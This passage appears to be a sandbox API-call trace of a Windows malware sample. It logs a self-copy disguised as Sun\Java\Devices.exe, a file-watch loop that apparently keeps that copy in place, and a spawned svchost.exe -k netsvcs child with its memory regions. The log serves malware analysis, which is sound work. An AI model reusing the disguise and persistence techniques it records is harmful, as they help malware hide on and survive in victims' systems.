pszDest=0x5413b48, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366142") returned 10 [0120.541] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366142") returned 10 [0120.542] wvnsprintfA (in: pszDest=0x5413b48, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366147") returned 10 [0120.543] wvnsprintfA (in: pszDest=0x5413b88, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366147") returned 10 [0120.544] wvnsprintfA (in: pszDest=0x5413a68, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366202") returned 10 [0120.572] wvnsprintfA (in: pszDest=0x5413be8, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366202") returned 10 [0120.573] wvnsprintfA (in: pszDest=0x5413be8, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366202") returned 10 [0120.574] wvnsprintfA (in: pszDest=0x5413be8, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366202") returned 10 [0120.574] wvnsprintfA (in: pszDest=0x5413be8, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366202") returned 10 [0120.577] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0120.579] WriteFile (in: hFile=0x1b0, lpBuffer=0x54064e0*, nNumberOfBytesToWrite=0xd9d, lpNumberOfBytesWritten=0x769ebfc, lpOverlapped=0x0 | out: lpBuffer=0x54064e0*, lpNumberOfBytesWritten=0x769ebfc, lpOverlapped=0x0) returned 1 [0120.581] CloseHandle (hObject=0x1b0) returned 1 [0120.589] ReleaseMutex (hMutex=0x1ec) returned 1 [0120.623] CloseHandle (hObject=0x1ec) returned 1 [0120.623] SetLastError (dwErrCode=0x0) [0120.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x769ef8e, cbMultiByte=20, lpWideCharStr=0x769ede8, cchWideChar=150 | out: lpWideCharStr="Sun\\Java\\Devices.exe") returned 20 [0120.624] PathCombineW (in: pszDest=0x769f530, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun\\Java\\Devices.exe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" [0120.624] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\sun\\java\\devices.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0120.625] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x769f208 | out: lpFileSize=0x769f208*=124416) returned 1 [0120.625] VirtualAlloc (lpAddress=0x0, dwSize=0x1e600, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.625] ReadFile (in: hFile=0x1ec, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0x1e600, lpNumberOfBytesRead=0x769f214, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x769f214*=0x1e600, lpOverlapped=0x0) returned 1 [0120.628] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0120.629] GetProcAddress (hModule=0x773d0000, lpProcName="RtlEnterCriticalSection") returned 0x77415e80 [0120.632] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0120.633] GetProcAddress (hModule=0x773d0000, lpProcName="RtlLeaveCriticalSection") returned 0x77415e00 [0120.634] CloseHandle (hObject=0x1ec) returned 1 [0120.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x769f8e2, cbMultiByte=20, lpWideCharStr=0x769fd70, cchWideChar=150 | out: lpWideCharStr="Sun\\Java\\Devices.exe") returned 20 [0120.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x769f8e2, cbMultiByte=8, lpWideCharStr=0x769f738, cchWideChar=150 | out: lpWideCharStr="Sun\\Java") returned 8 [0120.634] PathCombineW (in: pszDest=0x769fb68, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun\\Java" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java" [0120.634] FindFirstChangeNotificationW (lpPathName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", bWatchSubtree=1, dwNotifyFilter=0x13) returned 0x1ec [0120.635] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0120.848] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0120.849] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0120.849] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0120.850] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0120.850] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0120.850] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0120.850] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0120.850] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0120.921] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0120.922] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0120.922] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0120.922] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0120.979] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0120.979] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0120.980] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0120.980] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0120.990] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0120.990] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0120.990] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0120.990] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.047] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.047] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.047] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.047] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.048] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.048] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.048] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.048] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.076] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.077] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.077] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.077] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.082] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.082] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.082] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.082] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.118] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.118] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.118] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.118] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.228] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.228] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.228] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.229] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.502] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.503] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.503] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.503] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.577] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.577] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.578] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.578] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.808] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.808] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.808] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.808] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0121.824] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0121.825] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0121.825] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0121.825] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.005] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.005] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.005] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.006] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.006] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.006] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.006] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.006] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.087] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.087] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.088] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.088] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.141] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.142] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.142] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.144] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.291] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.291] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.291] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.291] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.325] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.325] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.325] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.325] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.444] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.444] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.444] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.444] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.444] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.444] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.445] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.445] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.581] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.581] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.582] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.582] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.582] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.582] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.582] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.583] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.647] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.647] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.648] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.648] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.654] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.655] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.655] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.655] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.765] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.765] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.766] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.766] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.773] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.774] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.774] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.774] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.845] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.845] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.845] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.845] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.919] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.919] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.919] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.920] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0122.989] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0122.990] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0122.990] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0122.990] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0123.000] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0123.000] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0123.000] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0123.001] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0127.537] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0127.537] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0127.538] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0127.538] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0127.551] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0127.552] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0127.552] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0127.552] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0127.626] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0127.626] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0127.627] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0127.627] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0127.631] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0127.631] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0127.631] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0127.631] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0127.704] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0127.704] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0127.704] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0127.704] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0127.708] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java") returned 1 [0127.708] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned 1 [0127.709] FindNextChangeNotification (hChangeHandle=0x1ec) returned 1 [0127.709] WaitForMultipleObjects (nCount=0x3, lpHandles=0x769f228*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 26 os_tid = 0xd80 [0120.224] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xffffffff) Thread: id = 27 os_tid = 0xd84 Thread: id = 28 os_tid = 0xd88 Thread: id = 34 os_tid = 0xda0 Thread: id = 35 os_tid = 0xda4 Thread: id = 36 os_tid = 0xdac Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x480c3000" os_pid = "0xc54" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x84" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\" Region: id = 353 start_va = 0x4b0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 354 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 355 start_va = 0x4e0000 end_va = 0x4f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 356 start_va = 0x500000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 357 start_va = 0x540000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 358 start_va = 0x580000 end_va = 0x583fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 359 start_va = 0x590000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 360 start_va = 0x5a0000 end_va = 0x5a1fff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 361 start_va = 0x900000 end_va = 0x90afff entry_point = 0x902720 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" Region: id = 362 start_va = 0x910000 end_va = 0x490ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 363 start_va = 0x773d0000 end_va = 0x77548fff entry_point = 0x773d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" Region: id = 364 start_va = 0x7f470000 end_va = 0x7f492fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f470000" filename = "" Region: id = 365 start_va = 0x7f49a000 end_va = 0x7f49afff entry_point = 0x0 region_type = private name = "private_0x000000007f49a000" filename = "" Region: id = 366 start_va = 0x7f49c000 end_va = 0x7f49efff entry_point = 0x0 region_type = private name = "private_0x000000007f49c000" filename = "" Region: id = 367 start_va = 0x7f49f000 end_va = 0x7f49ffff entry_point = 0x0 region_type = private name = "private_0x000000007f49f000" filename = "" Region: id = 368 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 369 start_va = 0x7fff0000 end_va = 0x7dfd2ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 370 start_va = 0x7dfd2ef60000 end_va = 0x7ffd2ef5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd2ef60000" filename = "" Region: id = 371 start_va = 0x7ffd2ef60000 end_va = 0x7ffd2f121fff entry_point = 0x7ffd2ef60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 372 start_va = 0x7ffd2f122000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffd2f122000" filename = "" Region: id = 373 start_va = 0x5b0000 end_va = 0x5d3fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 374 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 375 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 376 start_va = 0x6b0000 